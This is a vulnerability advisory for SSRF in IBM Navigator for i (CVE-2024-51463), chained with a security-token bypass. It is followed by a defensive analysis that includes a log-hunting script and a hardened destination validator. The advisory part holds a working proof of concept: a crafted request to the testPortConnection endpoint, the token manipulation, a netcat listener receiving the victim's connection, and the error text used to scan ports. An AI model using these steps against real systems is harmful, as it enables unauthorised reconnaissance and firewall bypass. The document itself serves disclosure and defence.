IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)

Exploit Author: hyp3rlinx
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Unknown
Published Date: 2025-04-15
# Author Title: John Page (aka hyp3rlinx)
# Author Website: hyp3rlinx.altervista.org
# Source:  https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com



[Vendor]
www.ibm.com

[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i.
IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application.
This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.


[Vulnerability Type]
Server Side Request Forgery (SSRF)

[CVE Reference]
CVE-2024-51463

[Security Issue]
IBM i is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system,
potentially leading to network enumeration or facilitating other attacks.

Post-authentication server-side request forgery from the IBM i host to arbitrary external hosts (non-managed nodes) on any TCP port. Two call vectors can be abused here.
The first is the "Test TLS connection" function, but it only allows connections to TCP port 9476.

The second is another servlet method, "testConnectPort" (the serviceability/testPortConnection endpoint in the PoC below), which an authenticated attacker can use
to make the system connect to any IP address and port, including hosts outside the LAN. This can be abused for port scanning, information disclosure, data exfiltration,
bypassing firewall rules to attack non-managed nodes, or connecting to attacker-controlled C2 infrastructure.

This SSRF relies on the HTTP servlet security token bypass CVE-2024-51464: an intercepted request's MN token is incremented or zero-padded, the
attacker-controlled token is still accepted as valid, and the HTTP 403 Forbidden restriction on the servlet is bypassed.


[Exploit/POC]
1) Attacker request (authenticated session; MN token manipulated as described above)

POST /Navigator/DispatcherServlet/serviceability/testPortConnection?system=10.1.1.4
{"hostname":"10.2.10.16", "port":445}

2) Attacker's C2 listener

┌──(root㉿kali)-[/usr/share]
└─# nc -llvp 445
listening on [any] 445 ...
connect to [10.2.10.16] from victimhost [10.1.1.4] 44569


For port scanning, whether a port on the external host is open or closed can be inferred from the error response:

Port is open:
Error 500: Connection reset

Port is closed:
Error 500: A remote host refused an attempted connect


[References]
ADV0142856
https://www.ibm.com/support/pages/node/7179509

[Affected versions]
7.5.0, 7.4.0, 7.3.0


[Network Access]
Remote


[Severity]
Medium
CVSS Base score:  5.4

Vendor Notification: 10/14/2024
Vendor fix and publication: 12/20/2024
Public Disclosure: 12/27/2024



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


IBM Navigator for i — SSRF (CVE-2024-51463) and HTTP Token Bypass (CVE-2024-51464): Analysis, Impact, and Mitigation

IBM Navigator for i is a web console included with IBM i that provides administration capabilities via a browser. In late 2024 two related issues affecting Navigator for i were disclosed: a server-side request forgery (SSRF) in the serviceability test-connection functions, and an HTTP security token bypass that lets an authenticated user reach those functions despite the servlet's HTTP 403 restriction. The issues affect multiple released versions of Navigator for i and allow an authenticated attacker to make the IBM i host initiate TCP connections on their behalf.

Executive summary

  • Vulnerabilities: CVE-2024-51463 (SSRF) and CVE-2024-51464 (HTTP security token bypass)
  • Affected versions: Navigator for i 7.3.x, 7.4.x, 7.5.x (per vendor advisory)
  • Severity: Medium (vendor CVSS base score 5.4); exploitation requires an authenticated Navigator session, with the token bypass defeating the servlet's per-request token check rather than the login itself, but the resulting SSRF can be used for internal reconnaissance or to reach external hosts on any TCP port
  • Vendor advisory: IBM ADV0142856 & related support pages — apply vendor-supplied updates and mitigations

What is SSRF and why it matters here

Server‑Side Request Forgery (SSRF) occurs when a vulnerable server can be coerced into making arbitrary network requests supplied by an attacker. SSRF is dangerous because a compromised server typically has more internal network access than an external attacker, and it can be used to:

  • Scan internal hosts and ports that are not exposed externally
  • Reach services protected by internal firewalls or ACLs
  • Pivot to management interfaces, metadata services, or other sensitive endpoints
  • Stage or facilitate data exfiltration or command-and-control (C2) communications

How the Navigator issues combine to create SSRF risk

The issues disclosed in late 2024 are complementary: one permits an attacker to bypass an HTTP servlet security token check, and the other exposes functionality that triggers outbound connections (the serviceability test-connection functions). In practice:

  • The token bypass lets an authenticated attacker defeat the per-request security token check on certain servlet endpoints: an intercepted MN token that is incremented or zero-padded is still accepted, so a request that would otherwise receive HTTP 403 Forbidden goes through.
  • Once that check is defeated, the serviceability functions that accept a hostname/IP and port make the IBM i host open a TCP connection to the attacker-specified destination. The "Test TLS connection" function is limited to port 9476, but the testPortConnection method accepts any host and any port, including hosts outside the LAN.

Because testPortConnection accepts arbitrary remote hosts and TCP ports, it can be used for port scanning (the error text returned distinguishes open from closed ports), reachability checks and follow-on attacks once chained with the token bypass.

Realistic impact and abuse cases

  • Internal reconnaissance: an attacker with valid Navigator credentials and the token bypass can probe internal services and management interfaces that are not accessible externally.
  • Firewall/segmentation bypass: the IBM i host can be used as a proxy to contact otherwise-protected destinations.
  • Information disclosure and pivoting: a successful SSRF may reveal service fingerprints or allow access to internal-only APIs, increasing the risk of subsequent compromise.
  • Command & control facilitation: the PoC shows the IBM i host completing a TCP connection to an attacker-controlled listener, so the host can be made to contact attacker infrastructure through egress controls that trust it; turning such connects into a usable channel would require additional control of the host.

Detection and threat hunting (defender guidance)

Focus detection on anomalous serviceability/test-connection activity, unusual outbound connections from IBM i systems, and token-related authentication anomalies. Suggested indicators and log sources:

  • Web server access logs for Navigator for i showing requests to the serviceability test functions (e.g. DispatcherServlet/serviceability/testPortConnection) from unusual accounts or source IPs, or in rapid succession from one session.
  • Outbound connection logs or netflow showing the IBM i host initiating connections to many distinct external IPs or ports, especially ports it has no business contacting (the PoC uses 445).
  • Application or web server error logs showing bursts of HTTP 500 errors with connection text ("Connection reset", "A remote host refused an attempted connect"): these are the responses an attacker reads to tell open ports from closed ones, so a run of them is a port-scan signature.
  • Authentication or token validation anomalies in the web application logs around the time of suspicious requests, such as zero-padded or out-of-sequence MN tokens.

When investigating, correlate web access logs to network logs (firewall, proxy, netflow) and system logs on the IBM i host to determine whether outbound connections were initiated and what responses were observed.
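The detection logic described above, as an added example that is not part of the advisory or of IBM's tooling: it parses constructed access-log and error-log lines (both layouts are assumptions; adapt the two regexes to the real logs), flags accounts that call the serviceability test endpoints in bursts, and counts the "Connection reset" / "refused an attempted connect" 500 errors that the advisory identifies as the open/closed-port oracle. Treating every method under the serviceability path as a test-connection call is also an assumption.

```python
"""
Threat hunt for abuse of the Navigator for i serviceability test-connection
endpoints. Added example, not IBM's or the advisory author's code. The log
formats are ASSUMPTIONS (an NCSA-style access log and a one-line-per-event
application error log); the sample lines at the bottom are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Servlet path prefix from the PoC; testPortConnection is the method it calls.
SERVICEABILITY_PREFIX = "/Navigator/DispatcherServlet/serviceability/"

# access log (assumed layout): client - user [time] "VERB path PROTO" status size
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
ACCESS_TS = "%d/%b/%Y:%H:%M:%S %z"
# error log (assumed layout): ISO-time ERROR <servletMethod>: <message>
ERROR_RE = re.compile(r'^\S+ ERROR (?P<method>\w+): (?P<msg>.*)$')


def classify_oracle(msg):
    """Apply the advisory's mapping of the HTTP 500 text to the probed port."""
    if "Connection reset" in msg:
        return "open"
    if "refused an attempted connect" in msg:
        return "closed"
    return "unknown"


def parse_access(lines):
    """Keep only serviceability requests, as (ts, src, user, method, status)."""
    events = []
    for line in lines:
        m = ACCESS_RE.match(line.strip())
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if not path.startswith(SERVICEABILITY_PREFIX):
            continue
        events.append((datetime.strptime(m["ts"], ACCESS_TS), m["src"], m["user"],
                       path[len(SERVICEABILITY_PREFIX):], int(m["status"])))
    return events


def burst_keys(events, window, threshold):
    """(user, src) pairs with >= threshold test calls inside one window.
    Sliding window over sorted timestamps; the value is the largest burst seen."""
    stamps_by_key = defaultdict(list)
    for ts, src, user, _method, _status in events:
        stamps_by_key[(user, src)].append(ts)
    bursts = {}
    for key, stamps in stamps_by_key.items():
        stamps.sort()
        lo = 0
        for hi, ts in enumerate(stamps):
            while ts - stamps[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                bursts[key] = max(bursts.get(key, 0), hi - lo + 1)
    return bursts


def oracle_summary(error_lines):
    """Count open/closed/unknown verdicts leaked by test-connection error lines."""
    counts = {"open": 0, "closed": 0, "unknown": 0}
    for line in error_lines:
        m = ERROR_RE.match(line.strip())
        if m and m["method"].lower().startswith("test"):
            counts[classify_oracle(m["msg"])] += 1
    return counts


def hunt(access_lines, error_lines, window=timedelta(minutes=5), threshold=5):
    """Correlate both sources: a burst of test calls plus a run of connect
    errors is the port-scan pattern the advisory describes."""
    bursts = burst_keys(parse_access(access_lines), window, threshold)
    oracle = oracle_summary(error_lines)
    probes = oracle["open"] + oracle["closed"]
    return {"bursts": bursts, "oracle": oracle,
            "scan_likely": bool(bursts) and probes >= threshold}


# Constructed sample data: one account probing seven ports in under a minute,
# one routine test call, one unrelated login request.
SAMPLE_ACCESS = [
    f'10.9.9.9 - qsecofr [27/Dec/2024:10:15:{s:02d} +0000] "POST {SERVICEABILITY_PREFIX}'
    f'testPortConnection?system=10.1.1.4 HTTP/1.1" 500 212'
    for s in range(1, 56, 8)
] + [
    f'10.1.5.5 - opsadmin [27/Dec/2024:10:20:00 +0000] "POST {SERVICEABILITY_PREFIX}'
    f'testPortConnection?system=10.1.1.4 HTTP/1.1" 200 88',
    '10.1.5.5 - opsadmin [27/Dec/2024:10:21:00 +0000] "GET /Navigator/login HTTP/1.1" 200 1024',
]
SAMPLE_ERRORS = (
    ["2024-12-27T10:15:01Z ERROR testPortConnection: Error 500: A remote host refused an attempted connect"] * 5
    + ["2024-12-27T10:15:41Z ERROR testPortConnection: Error 500: Connection reset"] * 2
)

if __name__ == "__main__":
    print(hunt(SAMPLE_ACCESS, SAMPLE_ERRORS))
```

The access log alone cannot show which hosts and ports were probed, because the target travels in the POST body; the error log supplies the verdicts, and the two are tied together by time window and by the account that was active. Tune `window` and `threshold` to how often your operators legitimately use the test-connection feature.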

Mitigation and remediation

Prioritize patching and apply the vendor-supplied updates. In addition to applying the official fixes, implement these compensating controls until patches are deployed and validated:

  • Apply security updates from IBM as recommended in the advisory (ADV0142856 / vendor support pages).
  • Restrict access to the Navigator for i web interface to trusted management networks via network ACLs, firewall rules, or VPNs.
  • Harden egress filtering — block or tightly restrict outbound connections from management hosts to the public internet and to arbitrary ports.
  • Disable or restrict the serviceability/test features if they are not required in your environment, or restrict the destinations they may contact to the managed-node inventory and the ports the feature actually needs, behind an additional access control layer.
  • Enforce strong authentication (unique admin accounts, least privilege, MFA where possible) and monitor administrative access.
  • Restart affected services after patching and rotate any secrets or tokens if advised by the vendor.
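A hardened form of the test-connection destination check, as an added example that is not IBM's code: the serviceability function should only reach managed nodes on the ports the feature needs, which is exactly the restriction the advisory's finding ("non managed nodes ... any TCP ports") shows was absent. The managed-node inventory, hostnames and port set below are constructed; 9476 is the one port the advisory itself names.

```python
"""
Destination check for a "test connection" serviceability feature, written as the
hardened counterpart of the behaviour in the advisory. Added example, not IBM's
code. Inventory, ports and hostnames are constructed.
"""
import ipaddress
import socket

# Constructed inventory of managed nodes and of the ports an operator may test.
# 9476 is the port the advisory names for "Test TLS connection"; the other two
# are assumptions for illustration.
MANAGED_NODES = {ipaddress.ip_address("10.1.1.4"), ipaddress.ip_address("10.1.1.5")}
ALLOWED_PORTS = {9476, 2001, 8470}


class TargetRejected(ValueError):
    """Raised when a requested test target is not a managed node / allowed port."""


def default_resolver(host):
    """Every address `host` resolves to (A and AAAA), as ip_address objects."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return {ipaddress.ip_address(info[4][0]) for info in infos}


def make_resolver(table):
    """Offline resolver over a constructed {name: [ip, ...]} table (for tests)."""
    def resolve(host):
        if host not in table:
            raise socket.gaierror(f"{host}: Name or service not known")
        return {ipaddress.ip_address(a) for a in table[host]}
    return resolve


def validate_target(hostname, port, managed=MANAGED_NODES,
                    allowed_ports=ALLOWED_PORTS, resolver=default_resolver):
    """Return the one (ip_literal, port) the server may connect to, or raise.

    Order of checks: port is an int on the allowlist; hostname is a managed IP
    literal, or a name whose EVERY resolved address is a managed node (a name
    mixing managed and unmanaged addresses is rejected, since the connect could
    pick either). The caller must connect to the returned literal rather than
    re-resolve the name, so a second lookup cannot redirect the connection.
    """
    if isinstance(port, bool) or not isinstance(port, int) or not 1 <= port <= 65535:
        raise TargetRejected(f"invalid port {port!r}")
    if port not in allowed_ports:
        raise TargetRejected(f"port {port} is not a permitted test port")
    try:
        addrs = {ipaddress.ip_address(hostname)}
    except ValueError:
        if not isinstance(hostname, str) or not 0 < len(hostname) <= 253:
            raise TargetRejected("invalid hostname") from None
        try:
            addrs = resolver(hostname)
        except OSError as exc:  # socket.gaierror is an OSError subclass
            raise TargetRejected(f"cannot resolve {hostname}: {exc}") from None
    if not addrs or not addrs <= managed:
        raise TargetRejected(f"{hostname} is not a managed node")
    chosen = sorted(addrs, key=lambda a: (a.version, int(a)))[0]
    return str(chosen), port


def demo():
    """Constructed cases; returns {case: (ip, port)} or {case: "rejected"}."""
    resolver = make_resolver({
        "node5.corp.example": ["10.1.1.5"],
        "c2.attacker.example": ["10.2.10.16"],              # PoC listener address
        "mixed.corp.example": ["10.1.1.4", "203.0.113.9"],  # one managed, one not
    })
    cases = {
        "managed ip literal": ("10.1.1.4", 9476),
        "managed name": ("node5.corp.example", 9476),
        "PoC target": ("10.2.10.16", 445),                   # the advisory's payload
        "c2 name, allowed port": ("c2.attacker.example", 9476),
        "mixed resolution": ("mixed.corp.example", 9476),
        "port as string": ("10.1.1.4", "9476"),
    }
    results = {}
    for name, (host, port) in cases.items():
        try:
            results[name] = validate_target(host, port, resolver=resolver)
        except TargetRejected:
            results[name] = "rejected"
    return results


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:24} -> {verdict}")
```

The check is deliberately an allowlist of addresses, not a denylist of "external" ranges: the advisory's attack works against any destination the operator did not intend, internal or external, and the inventory of managed nodes is the only thing the feature legitimately needs. Binding the connect to the resolved literal closes the gap where a hostname passes the check but resolves elsewhere when the connection is actually made.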

Incident response steps

  • Isolate affected systems if you suspect active exploitation to prevent further outbound connections and lateral movement.
  • Collect and preserve relevant logs: web access logs, application logs, system audit logs, and network logs covering the suspected time window.
  • Search for signs of data exfiltration, abnormal processes, or persistence mechanisms on the IBM i host.
  • After containment, apply vendor fixes, reconfigure network controls, and restore services following your change-control and validation procedures.
  • Consider a password and credential rotation for administrative accounts that may have been exposed or used during the incident.

Safe validation and testing

If you need to validate that your environment is no longer vulnerable, perform tests only in an isolated lab or maintenance window and follow safe-testing practices:

  • Operate in an isolated network segment with no production data or access to critical internal services.
  • Use vendor guidance and test cases that verify whether the fixed behavior is present, avoiding arbitrary outbound tests to public systems.
  • Coordinate with IBM support for recommended validation steps or tools if available.

References and vendor resources

  • IBM support: Navigator for i security bulletin ADV0142856, https://www.ibm.com/support/pages/node/7179509 (official vendor advisory and patch information; primary remediation source).
  • Vulnerability identifiers: CVE-2024-51463 (SSRF) and CVE-2024-51464 (HTTP security token bypass).
  • Original advisory: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt

Key takeaways

  • Apply IBM’s security updates promptly — this is the definitive remediation path.
  • Restrict access to Navigator for i to trusted management networks and implement egress filtering to reduce SSRF impact.
  • Hunt for anomalous web activity and outbound connections from IBM i hosts, and treat serviceability/test features as high-value attack surfaces.
  • When in doubt, engage IBM support for guidance tailored to your environment and for validation after patching.